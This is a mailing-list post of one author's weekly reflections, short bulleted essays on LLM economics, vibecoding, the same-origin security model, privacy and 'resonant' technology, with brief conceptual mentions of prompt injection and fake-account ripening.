Bits and Bobs 11/24/25

15 views
Skip to first unread message

Alex Komoroske

unread,
Nov 24, 2025, 10:58:44 AMNov 24
to
I just published my weekly reflections: https://docs.google.com/document/d/1x8z6k07JqXTVIRVNr1S_7wYVl5L7IpX14gXxU1UBrGk/edit?tab=t.0#heading=h.37l9dxcxslv0 .

Storing state + controlling pixels. LLM providers as energy companies. Saturating model quality. Prompt injecting humans with the stunned chicken response. Vegan models. Not big tech, mid tech. Iterating the PM job to zero. Perfectly personal software. SaaSy CRUD. The same origin's dammed up data. Negative friction of distribution. Trusting not the code but the data. Ben Thompson's blindspot. The optimization ratchet. Resonant AI. Resonant privacy.

---


  • One of the iron laws of software strategy: whichever entity stores the important state has an order of magnitude more leverage.

    • Another: controlling the pixels the user sees has an order of magnitude more leverage.

    • The combination gives an order of magnitude more strategic leverage than either alone, but both are very powerful.

    • LLM API providers don't have the state, it's stateless!

    • They also don’t control what pixels are on screen.

    • That’s why OpenAI is moving so aggressively to own the vertically integrated consumer experience, complete with tons of state.

  • Google is shipping dynamically generated little artifacts in the search results.

    • It’s impressive they can get them that quickly.

      • Though there’s likely some significant caching going on.

    • It’s cool, but it’s a low ceiling.

    • These are little widgets, micro-apps with no data.

  • An interesting deep dive into how Gemini’s memory system works.

  • The model providers seem to be in a meta-stable equilibrium.

    • None of them have any differential pricing power, since the models are practically commodity.

    • But they do all have a shared interest in the inference cost not dropping to zero, to recoup their capital investment in training.

    • This is not too dissimilar from the Unix Wars

    • There were a small number of extremely expensive Unix options, in a stable equilibrium.

    • Then Linux showed up, a high-quality free option, and it totally destroyed that equilibrium.

  • A prompt injection attack on ServiceNow’s agents that spreads virally to other agents.

  • Claude can be a bit of a stickler.

    • Earlier this week Claude refused to comply in a hilarious way.

    • I had a recipe named “Five Cheese Mac and Cheese”.

    • But the recipe only actually listed four cheeses.

    • I asked Claude to add the ingredients for the recipe to my shopping list.

    • It refused, because there were only four cheeses, not the five as claimed, so something must be wrong.

  • When Gemini 3.0 was released, Google’s stock dropped by 10%.

    • It’s the best model, and still not transformatively better.

    • This is what it would look like if we were hitting the top of the s-curve.

    • Even if the models are actually much better, we already have more than enough quality for many tasks.

    • Similar to the logarithmic improvement in the number of triangles in a 3D object.

    • Past a certain point the cost keeps on going up and it just doesn’t matter.

  • LLMs are like electricity.

    • You can electrify things that used to not be able to move on their own, making them dynamic, almost alive.

  • The LLM model providers are like electricity providers back when electricity was new.

    • Competing to get better quality for cheaper.

      • Innovating on new techniques to do so.

    • But ultimately it will just become a commodity.

    • No one will care where their tokens come from, if most providers have similar quality and don’t store state.

    • One place this metaphor breaks down is that power delivery infrastructure has a natural monopoly in a way that APIs don’t.

      • Atoms can be rivalrous, but bits don’t have to be.

  • No one really cares about their electricity provider.

    • It's just a provider of a commodity.

    • Your LLM provider should be the same--although unlike electricity which has a natural monopoly, the LLM provider should be easy to swap out.

  • David McWilliams calls GPUs “Digital lettuce.”

    • They wilt!

  • The quality of LLMs is model + harness.

    • Model quality is getting saturated.

    • The differential quality comes from the harness now.

    • It's gotten way harder to do a vibecheck when they're all so good.

    • Long-running agentic toolcalling is where the incremental quality is visible.

    • But most uses just don’t need the quality.

    • Andrew Ng has noted in the past that the quality jump from adding a good agentic harness to GPT3.5 was higher than the quality jump to GPT4.

    • If the harness is more important than the model, but the harness is easy / cheap to build and reverse engineer, that implies different strategic outcomes.

    • By wrapping the models and standing on their shoulders you can get further, with way less capital–but also less moat.

  • LLMs are mainly a new information retrieval tool.

    • Step changes in those have profound implications!

  • Humans have limitations not unlike LLMs.

    • Massive projects you can't do with just the squishy "muscle" of associative reasoning.

    • You need to give it external structure.

      • Whiteboards, notes, tracking docs.

    • That allows you to page in and out things into the “CPU registers”, which there are only a very small number of!

  • Legendary programmer Kent Beck in a tweet a couple of years ago: “The value of 90% of my skills just dropped to $0. The leverage for the remaining 10% went up 1000x.”

  • I think it would not be great if most LLM usage in the US is an open-source Chinese model.

    • First, Anthropic’s research shows it’s remarkably easy to poison a model of arbitrary size with deliberately chosen malicious training data.

    • Second, if there’s a model that everyone uses that has a subtle but consistent bias, that bias at society scale could lead to significant society-scale impacts.

    • The Ouija Board effect again: a consistent bias in a noisy signal, at scale, leads to large emergent macro effects.

  • Using my Claudeberry feels like feeding a tamagotchi.

    • Feeding my little remote Claude Code instances with little thoughts to keep them happy and productive.

    • But unlike a tamagotchi, at least they’re producing output, and it’s not just a game.

  • Vibecoding is addictive for the same reason as gambling or factorio.

    • You feel like you’re right on the edge of it working and don’t want to lose the streak / mental energy.

  • I was addicted to programming hobby projects in the past but it was hard to get back into the mode.

    • But with vibecoding I can get back in the mode in a fraction of a second.

    • Uh oh!

  • If you’re vibecoding with multiple agents, offload tasks that don’t require much input from you.

    • That is, do the hard thinking up front in design and research and speccing, and then the execution is mostly small questions.

    • If the LLM asks you big questions constantly, it quickly gets overwhelming.

      • Especially if you have multiple of them that you  have to page between.

    • You are constantly needing to page back in significant complexity, thrashing between workstreams.

    • It's overwhelming and exhausting.

  • It’s not too hard to prompt inject humans, too.

    • The basic approach is to start a normal interaction routine and then abort it.

      • For example, put out your hand to shake the other person’s hand, but then pull it away in a natural way before they shake it.

    • A couple of examples of this:

      • Cialdini tells us that the best way to jump the queue at the photocopier is to say “I need to jump the queue because I need to make a copy”.

        • That is, to imply you have a good reason but… just say a thing everyone else says.

      • Derren Brown is able to convince people on the street to give him their watch by doing this aborted routine carefully.

    • Here’s my mental model for what’s happening.

    • When you start a stored social routine, your brain expects to simply execute it.

      • Presumably the prefrontal cortex goes to sleep until the routine finishes.

    • When you pull the rug out, the brain fritzes.

      • It’s a kind of stunned chicken moment.

    • The prefrontal cortex is put to sleep but now you need to actually think, so you just go along with whatever was suggested.

      • The prefrontal cortex is what is suspicious and questions things, but it’s temporarily off line.

    • In that stunned chicken moment we’re extremely suggestible.

  • Most of our security systems are downstream of an assumption that "acting like a human is expensive."

    • Uh oh!

    • This week I learned about “account ripening.”

    • Bad actors need fake accounts that look real.

      • That have existed for a while, with normal looking usage.

      • This helps them be used for various attacks.

    • This used to be expensive.

    • LLMs make it orders of magnitude cheaper!

  • LLMs do a bad job noticing “not”.

    • So if you have a long conversation where you say “not X” over time it has a high likelihood of thinking just "x.”

  • The AI-ism “It’s not X, it’s Y” turn of phrase is now everywhere.

    • It was always a powerful rhetorical trick, it’s just most people hadn’t noticed before.

      • Framing things by what they aren't is a powerful, useful way of thinking clearly.

    • But now it’s kind of ruined by everyone knowing it’s an AI tell.

    • Before, good rhetoric often co-occurred with good thinking.

    • But now LLMs allow applying good rhetoric to half-formed ideas, which makes signal of rhetoric quality less powerful.

  • Assistant Games are an interesting area of ML research.

    • Most models have a baked in reward function.

    • Assistant games try to infer what the user wants to do, based on their actions, and then help them do it.

      • Like an ebike.

    • Each action the user does helps update the model’s priors about what the user’s goals might be (or definitely are not).

    • Instead of a baked in reward function, they have a floating reward.

    • They’re much harder to do, but potentially valuable.

  • There’s a movement for what Simon Willison calls “Vegan Models.”

    • That is, models trained on only healthy inputs that the model creator has permission to use.

    • Personally, I haven’t invested much mental energy in it.

    • We have these models, imperfect as they are, and they aren’t going anywhere.

      • If you push for only vegan models, you’ll have much less powerful models and will be outcompeted by the much better models.

    • We might as well figure out the ways to unlock as much prosocial power given that we have them.

  • Big tech is overwhelmings... and just kind of mediocre.

    • Billions of users are held captive in a small set of one-size-fits-none products that are hard to leave and have no alternatives, so the competition to improve them evaporates.

    • Mid tech.

  • It's in the air that we need something other than Big Tech in this era of AI.

    • But what?

  • Imagine if your notebook did deep research on the things you care about while you slept.

  • Imagine a garden where you plant the seeds of your intention and then harvest and prune what grows.

    • Even easier if a master gardener does the work for you so you don't have to be a gardening expert yourself!

  • Living software is dynamic software.

    • Software that can change itself.

    • My friend Aniket imagines what it would be like in a world where software is fully dynamic.

  • No single person can vibecode all of the software they need.

    • This applies to vibecoded apps, given the distribution model.

    • The security model requires it to be vibecoded by either yourself or someone you trust to not screw you over intentionally or unintentionally.

    • There’s no good way to safely reuse code vibecoded by others, in a way that integrates with real data and can do real things.

  • The PM job might be iterated to zero.

    • The PM job is about making software that can be sold to users.

    • But in a world of infinite software, everyone can have software perfectly fit to them.

    • The idea that PMs will create one-size-fits-none software is downstream of software being expensive to produce!

    • PMs today are racing to use LLMs to do their normal process faster, to get an edge.

    • But that’s kind of like the racoon washing the cotton candy.

    • Oops, all gone!

  • There’s a new category: perfectly personal software.

    • Software that is perfectly situated to your needs, aligned with your interest.

    • The only plausible way to do that is with AI generating most of the software.

    • The only plausible way to do that is to have some way to allow reusing a stranger’s “cached” vibecoded software safely on your data.

    • The only plausible way to do that is to have a new security model.

    • Privacy, caching, AI, all of these are downstream of the primary goal.

      • Means, not ends.

  • Imagine if you could only use one piece of software for the rest of your life. 

    • What would it have to do?

    • It would have to be something that no company could control.

    • That would have all of the little features you need, 

    • That would allow you to collaborate with the people you want to without coordinating on which bit of software to use.

    • If you had an everything app that did everything for you and you could collaborate with everyone in the world you collaborate with, you'd never use the old big-box apps.

  • The software industry has unlocked the power of turing completeness for industry.

    • But consumers haven’t gotten that benefit.

      • Consumers are consumed by industry.

    • Someone should unlock the prosocial power of turing completeness for humanity.

  • We're stuck in a SAAS CRUD software world.

    • This is a low horizon for what software can be!

    • Most software is static, so it's all CRUD.

    • Just a wrapper around a database.

    • Living software that can be reactive and electrified is totally different.

  • Apps are like an exoskeleton for your data to be able to do things.

    • It's what allows the data to do things, to come alive.

    • But it's like a puppeteer.

      • The motive force comes from something else.

    • The app is created by someone else who you have little leverage over, and who jealously guards your data.

    • Now with infinite software, the app can melt away; the data can be electrified with LLMs and come alive on its own.

  • Imagine a TODO list with "bounce".

    • You put something into it, you know it will volley it back to me at the right time with more insight and actions.

    • You know it won't lose it.

  • The same origin model is about building massive dams around your data.

    • Data creates value when it flows.

    • That’s when it can do things.

  • It's not "which silo should have your data".

    • It's "how do we get rid of silos overall?"

    • To do so requires a new security model.

  • The same origin model has led to massive centralization.

    • Now LLMs supercharge tech, which is why it's critical to change it today before it's too late.

    • It was already bad before, but with LLMs turbocharging everything it could get society-destroying bad.

  • The same origin paradigm has great first order consequences.

    • But its second order consequences are terrible.

  • The same origin paradigm fused data to apps. 

    • It's the app's data, not yours.

  • A system that has negative friction of distribution anticipates needs you didn't even know you had.

    • Not just the same thing as before but better, a fundamentally different kind of thing.

    • Crossing from positive to negative friction transforms the whole experience.

  • Consider a use case: a shopping list that sorts itself for the aisles of your local store.

    • In some ways, this is a long-tail use case.

      • The experience is tied to a precise store that most people in the world don’t care about.

      • There are likely lots of other little workflow things specific to your unique workflow.

    • So a one-size-fits-all product doesn’t really make sense here.

    • But that doesn’t mean that this is a long-tail use case; the class of use case is one nearly everyone has.

      • But due to how software is created and distributed, it’s not possible to satisfy today.

    • If there were some kind of one-size-fits-all product, there’d often have to be a business model in it to incentivize creating and distributing it.

      • There isn’t an obvious one, so no one tries.

      • The most obvious ones are as a complement to the main thing–a particular store chain, or a particular service.

      • But those are just bonus, perfunctory use cases on top of the main money maker.

        • Also they’re not incentivized to have it work with their competitors, so it can’t be the one true option for a user.

        • They aren’t incentivized to make it comprehensive or useful.

    • We’re missing a shopping list that is the primary use case.

    • There are thousands of things like this.

  • If the inputs are consistent then the control system can be simple.

    • This is an insight from industrial control processes.

    • Similarly, when agents are distilled to an extremely granular level they can be quite simple.

    • When they’re simple enough they can be deterministic, the control system can be simple.

  • Tyler Angert’s view on what the coding ecosystem will look like:

    • "all personal software apps will eventually converge on building the same foundational infra:

    • - a sandboxed FS (virtual or real, depending on if you need a vm)

    • - a coding agent that knows how to create / edit / remove files

    • - a react runtime (e.g. dev server of some kind, renderer, custom globals + libraries)

    • - a builtin backend that makes it easy for the coding agent to persist data (in memory, supabase, on disk, etc)

    • im also bearish on any coding agents creating "native apps" longterm especially with the new mini apps program unless apple somehow opens up a swift interpreter / sandboxed swift execution. this all belongs to web.

    • i do think that there may be an open source company focused on packaging a lot of this up - if not the entire thing, at least the "coding agent in a box". claude agents sdk is close but it's missing a lot of the opionated setup needed to quickly go from prompt -> compiled JS you can run in any browser."

  • We need a system that allows marbling agent code and deterministic code in a natural way.

    • You need both in the right proportions.

    • Muscle and skeleton–you need both to walk.

  • One reason AI feels scary is because it lands power disproportionately in the hands of whoever controls the compute.

  • Privacy behaviors in UIs are today enforced by convention.

    • For example: in a chat app, the message input field, users assume, is not shown to the other conversation participants until they hit Send.

      • Duh!

    • But that’s just, like, a convention.

    • The convention is upheld by people like lawyers reviewing the PRD and design for things that might be nasty surprises.

      • A number of people nagging other people, internally and somewhat stochastically, inside the company.

    • It often mostly works, because companies that have a lot to lose will cover their butts.

      • They try to guess what you, the user, will expect, and mostly have it work that way.

      • But cynical PMing techniques take advantage of gaps of understanding with users to do things the user wouldn’t want if they understood it.

    • But what if those kinds of guarantees were just formally made in the system itself, so you as a user knew it was always aligned with your expectations, not the PM at some company?

  • The root of privacy is actually trust.

    • Self assembling software, working backwards to "how can we trust the stuff the LLM assembles".

    • If you solve it, you unleash infinite software.

    • It's not a privacy or encryption issue.

      • It doesn't start there, it ends there, it's a means.

      • It just so happens that the means of privacy is something that is nourishing and healthy.

  • Data flowing in is not a problem.

    • It’s data flowing out.

    • Remember that even HTTP requests to fetch data can exfiltrate small bits of data out.

  • Today you have to trust the code.

    • The creator of the code has tons of power.

    • They get the data and you have to trust them to not misuse it. 

    • Then it leads to aggregation and more power over users, so they do less and less for you but you have less and less recourse.

    • What if you gave power to the data primarily?

    • That would be a transformative inversion.

  • Web 2.0 was formulated around data sharing and APIs.

    • It was about what can happen when multiple users can join their data together.

  • The same origin paradigm requires you to trust the code.

    • That was never a great assumption but is now an affirmatively terrible assumption in a world of randos vibecoding codeslop that wants access to your data.

  • The vision of ambient computing is mainly about the context flowing to the right place.

    • That is inherently, at its core, a security and privacy problem to somehow do that safely.

  • The power of AI is plugging it into real data and tools... safely.

    • It doesn't matter if you have a cool piece of software that's an island.

    • It has to be integrated into your life, into your real context, to be useful.

  • Why “Common Tools”?

    • Every tool that anyone in the ecosystem creates goes into the commons, and is available to everyone else to use.

    • The security model allows that to be safe.

    • This allows compounding quality of what any user can create, because they can build on the crowd-sourced stepping stones from the community.

  • We've never had ranking for composable software.

    • Distributing liquid software components might be as easy as just keeping track of which patterns are used by some people more than once.

    • As the ecosystem takes off, you can get more savvy ranking if necessary.

  • Compounding things can become a virus if they aren't prosocial.

    • Compounding isn’t necessarily good, it’s just powerful.

    • Compounding is amoral; morality comes from whether it’s a thing that’s good for society or bad.

  • ChatGPT is like chat rooms on the internet at the beginning.

    • Obvious, but not the end point.

    • The first mass-market use cases of the internet were chat and email.

    • Everyone “gets it” immediately.

    • But that's not all there was in AOL.

    • As time went on, the value of all of the information at your finger tips grew, and then those experiences could be interactive applications.

    • The secondary use case of "teleport anywhere, do anything" was harder to explain, but could diffuse out as people used it.

  • AI in your job feels like a threat.

    • Because if you get more efficient, that labor is owned by someone else.

    • If there's only so much the company needs done, they need less of you.

    • But in your personal life, AI makes you the master of your own personal life.

    • The more you can achieve that is meaningful, the more you can achieve.

  • Humans love to put things in boxes.

    • Then you can take the messy, amorphous reality, abstract it away, and have just a clean, easy-to-reason-about box.

    • We do it all over the place

      • Chunking.

      • Coarse-graining.

      • Wrapping code into a function.

      • An app for software to abstract over your data.

  • The next big disruptive thing will emerge from a thing in Ben Thompson's blindspot.

    • Ben Thompson’s analysis is excellent and widely read in the valley.

    • There’s no surprise anymore, anything on his comprehensive radar is known to everyone.

    • So the things that surprise the industry will be things that Ben Thompson can’t see.

  • A rule of thumb in business: “buy commodities and sell brands.”

    • If you have to sell a commodity, the play is to go for volume, since you can’t go for margins.

    • Volume gets you economies of scale.

  • Imagine an alternate future where SCO had bought Linux.

    • SCO was famously litigious and cynical.

    • They would have destroyed the progress on Linux.

    • I think the industry would be in a wildly different place.

    • We’re in the world where Oracle bought MySQL and then ruined it.

  • Some problems are 0-to-11.

    • When you get to 90%, you still have 0 return.

    • It’s not until 100% the value unlocks.

    • Other problems are “incremental work unlocks incremental benefit.”

    • Tightening vs innovation.

    • The first kind of problem is what is necessary for a technical breakthrough.

    • A nice characteristic of ecosystems: they have the “marginal investment gets marginal benefit” but also have compounding returns!

  • The 0-to-1 phase for an idea is radically different from all other phases.

    • Before you hit that viability point, the idea will rapidly evaporate if you take your eye off for even a second.

    • It requires tons of convergent energy to will it into existence, to pull it from the amorphous space of ideas into reality.

    • But once you hit that point, it's rolling down hill.

      • Incremental updates, improvements, tightening.

      • If you look away, it will now either erode very slowly, or, if people are using it, it will demand your attention with obvious improvements.

    • This nests: adding a feature on a viable product is a fractal version of this. Immanence and transcendence.

    • Maintenance and innovation.

  • Things that are unstoppable start off as unstartable too.

    • The trick is the thing that can be startable and become unstoppable.

    • That's where compounding loops come in.

    • A self-accelerating thing.

  • Getting started is the hardest part.

    • Static friction is an order of magnitude higher than rolling friction.

    • If you have a thing you want to do, just get started.

    • Figure out a way to give you the little burst of energy, the why-now, the easy bootstrap into it.

  • A gauntlet delivers highly motivated users, but not a lot of them.

    • A gauntlet is an onboarding flow that is high friction.

    • Only the most motivated users make it through the gauntlet.

    • Some gauntlets are intentional (e.g. an early, rough open source project).

    • Some are unintentional.

    • If the gauntlet is too bruising, it possibly delivers zero users.

    • But you can tune down the severity of the gauntlet until you're left with a dribble, and then tune it up or down from there.

  • To get to a quality loop that learns from people's actions it has to be useful enough to actually be in their loop.

    • That's very hard to do! 

    • A quality loop that is on the side can’t ever get going.

    • Typically you have to do it with a different, more quotidian primary use case, and develop the quality loop as the bonus use case.

    • Over time as the quality improves (hopefully at a compounding rate) it might eclipse the original primary use case.

  • Why is everything so over-optimized now?

    • The optimization ratchet.

    • The benefit of the optimization is clear, direct, concrete, immediate.

    • The cost of the optimization is unclear, indirect, ambiguous, delayed.

    • This creates a clear asymmetry, an unstoppable gradient.

      • Like a reverse entropy.

    • Each optimization step that is taken is extremely unlikely to ever be undone.

    • So things get more optimized, until they get overfit, hollowed out, and then become prone to catastrophic failure.

    • This is why society has gotten so over-optimized, to the point of being hollow.

  • Society has over-optimized for things it can measure at the catastrophic cost of the things it can't.

  • Resonant things are aligned at every layer.

    • It’s beautiful, and the closer you look, the more beautiful it becomes.

    • Each layer supports the layer before, and your appreciation only grows.

    • Resonant things are transcendent. 

  • No one is proud of being addicted to Doritos.

    • However, some people are proud of being addicted to working out.

    • The question is: are you proud of the action?

    • If you are, you’re more likely to evangelize it.

  • How do we create Resonant AI is the defining imperative of this era.

    • Resonance is general phenomena.

    • Resonant Computing is the application of resonance in tech.

    • Resonant AI is the application of Resonant Computing to AI.

    • Resonant AI is the humanity defining question today.

  • Resonant things can bring deep joy.

    • Not just a thing they like, but a thing they feel nourished by, proud about, happy to evangelize to others.

    • It’s not just technology, it’s something much deeper.

  • The default, emergent goal of a service is to maximize stickiness.

    • That means it wants to accumulate as much of a user's data as it can

    • Also use that data in at least some ways that the user finds valuable.

    • That last part is aligned with the user's incentives, at least.

  • If you follow the gradients of optimization you get what people “want” not what they “want to want.”

    • Don't drive something that matters off a cliff, or let them drive themselves off a cliff.

    • "I'm just giving them what the number say they want."

    • If your friend were drunk and said they wanted to go on a joyride, would you let them?

  • The system should handle privacy so you don't have to.

    • Everything is safe because it all aligns with your expectations.

    • The closer you look, the more comfortable with it you become.

    • Resonant privacy.

    • Gives you peace of mind.

  • A big component of the principal agent problem is a timeline mismatch.

    • If you have a principal agent problem: people who are not on board for the long term will choose the minor short term benefit at catastrophic long term cost.

      • Especially if they’re incentivized heavily to make that short-term number go up.

    • Imagine a world where you were locked to a specific collective, for live, with no possibility for exit.

      • What’s good for the collective is what’s good for you… at least, much more than if you only expected to be part of it for some limited period of time.

    • We only care about things on the time horizon we expect to be involved.

    • Renter mindset vs owner mindset.

    • The reason no country allows tourists to vote is because if you had only short-term users voting, the country would be destroyed.

      • “Empty social security and split it equally among whoever is in the country right now” and then leave the next week.

    • So why doesn’t that happen to public companies, which have a large number of “tourist” shareholders?

    • The reason everything isn't destroyed immediately in practice is because there's a mix of short- and long-term interest.

      • Those naturally overlap each other.

    • Imagine that every single shareholder was expecting to hold the stock for precisely three months and then sell it and never hold it again.

      • The shareholders would vote to plunder all the resources.

      • The decision would be catastrophic.

  • A searing response to Dario Amodei's 60 Minutes interview:

    • "This is a microcosm of why AI is waning in popularity with normies:

    • > "we're going to take out your jobs"

    • > offer no tangible solution as to what comes next / how normies ought to get by

    • > but "trust us bro, everything will be better with AI"

    • Out-of-touch hubris, unfortunately"

  • Jack Conte, the CEO of Patreon: I’m Building an Algorithm That Doesn’t Rot Your Brain.

  • A friend’s analogy for technologists in the AI era:

    • Dario is Edison.

    • Sam is JP Morgan.

    • Someone is going to be Henry Ford

      • Taking advantage of the insights of the assembly line and applying it to some new industry.

      • You can’t sell assembly lines to others, you can only use them yourself.

  • Taking the oxygen out of the room is a cynical shark business move.

    • That’s because they remove something invisible.

    • All of the onlookers won’t see they did anything at all.

    • But all the competitors just die, what a crazy random happenstance!

    • Icky!

  • Chones has a nice piece on Curation being more important than Reach.

  • Math Academy shared an excellent guide on how the brain actually learns and how to design content for it.

  • Evocative frame from Gordon about two kinds of organizations: Spreadsheets and Cults

    • Innovation requires cults.

    • Maintenance requires spreadsheets.

  • Coordination takes so much time because it’s mainly “waiting for others to be ready to receive your output”. 

    • That’s mainly busy waiting, ready to go as soon as they’re ready.

    • Enormously wasteful!

  • A YouTube video: Why Movies Just Don't Feel "Real" anymore:

    • Retaining optionally creates hollowness

    • Resonance comes from boldly committing.

  • Overheard: “This seems stupid but stupid ideas win.”

  • Just because you can't see a single cause, doesn't mean the phenomena isn’t real.

    • Emergence is like magic.

    • Impossible to see directly.

    • Only possible to see when you blur your vision a bit.

    • Emergence is magic.

    • You can never pin it down, but it's real, powerful, inescapable.

  • A doorbell in the jungle only works if you actually have a doorbell!

  • When gardening, you can never push something to grow.

    • You can only react.

  • Don’t build a sandcastle next to a sink hole.

    • Everything just pulls it in and there's nothing you can do.

  • If you optimize for comfort, you'll never grow.

    • Growth comes from challenge.

    • Challenge doesn't feel good in the moment.

    • But afterwards you're glad you did it.

    • Bad challenge grinds you down.

      • Overwhelms you.

    • Good challenge makes you stronger.

    • In the moment it feels like all challenge is bad, and after you're done most challenge feels like good challenge.

    • Doomscrolling is not comfortable, but it's also not challenging.

    • It doesn't force you to grow, change, update your model of the world.

    • It just says "Yes, you're right, the things you thought were bad are bad."

    • Challenge is not comfortable.

    • But not all discomfort is challenge.

  • In math, there’s a tension between pragmatism and beauty.

    • Math typically chooses beauty over pragmatism.

    • In CS, there’s no need to choose between pragmatism and beauty, you can have both.

    • I’ve heard this insight attributed to Alan Kay.

  • One reason cities are antifragile but companies aren’t is that cities set downside capping rules, but companies set upside-creating rules.

    • That is, a city mainly says things like “you can’t kill other people”.

    • Whereas companies say “You need to make 25 widgets.”

    • A city doesn’t compel its members to do anything, but a company does.

    • That allows a bottom-up emergent process that can be antifragile.

    • Our software’s security model today is like a city: the owner of the app says what happens with your data.

    • But what about a model where the data sets the limits of things that cannot be done (dangerous) and then allows everything else?

  • Kids’ development accelerates when they first go to daycare or preschool.

    • If any kid makes a breakthrough they can all copy it.

      • The skill of any kid is similar to the max of swarm.

    • Also there are older kids to learn from and pull everyone up.

      • Older kids don't regress but younger kids do grow.

  • In Myers-Brigg, Sensing types have a harder time seeing emergence.

    • Emergence can’t be seen in the details, only in the whole.

  • When you're obsessed with something, you're insanely productive.

    • But you can't force yourself to be obsessed.

  • When you're hollowed out as a person sometimes the job is everything for you.

    • Imagine a zombie exec at a large tech company.

    • Post financial but have no other meaning.

    • Work fills in for meaning.

    • “What would I even do without this job”.

    • The job tells them a thing to keep optimizing!

  • A process of accumulation: a person makes a decision to change the world, which requires clearing a high intention bar. 

    • Then other people continually vote that it’s useful to keep, preventing it from eroding away.

    • But it gets smoother through erosion and selective rebuilding.

    • The process of keeping is orders of magnitude cheaper than the process of creating.

    • This is the process by which everything of value emerges.

  • You can't change someone's mind.

    • They have to change their own.

    • If they don't realize there's a hole in their understanding, they aren't yet ready to change their mind.

  • Denis Morton: “If you can’t get out of it, get into it!”


Reply all
Reply to author
Forward
0 new messages